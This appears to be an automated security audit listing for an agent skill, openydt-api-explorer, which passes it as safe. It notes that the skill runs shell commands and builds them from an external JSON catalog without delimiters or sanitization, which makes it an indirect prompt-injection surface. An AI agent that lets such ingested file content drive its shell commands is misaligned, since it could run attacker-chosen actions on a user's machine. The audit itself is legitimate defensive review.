Skills
skills/xiaowen-0725/openydt-cli/openydt-api-explorer/Gen Agent Trust Hub

openydt-api-explorer

Pass

Audited by Gen Agent Trust Hub on Jun 13, 2026

Risk Level: SAFECOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill provides instructions for executing the openydt CLI, along with jq and python3 for processing the API catalog.
  • [PROMPT_INJECTION]: The skill demonstrates an indirect prompt injection surface by ingesting content from an external JSON catalog to dynamically formulate CLI commands.
  • Ingestion points: The agent is instructed to read from catalog/catalog.json, including a hardcoded local developer path /Users/zhoujw/develop/tmp/openydt-cli/catalog/catalog.json.
  • Boundary markers: There are no explicit delimiters or protective instructions provided to isolate ingested data from the agent's command generation logic.
  • Capability inventory: The skill leverages shell execution via openydt, jq, and python3.
  • Sanitization: No validation or sanitization steps are defined for the data retrieved from the catalog file before it is used to construct commands.
Audit Metadata
Risk Level
SAFE
Analyzed
Jun 13, 2026, 01:16 PM
Security Audit — agent-trust-hub — openydt-api-explorer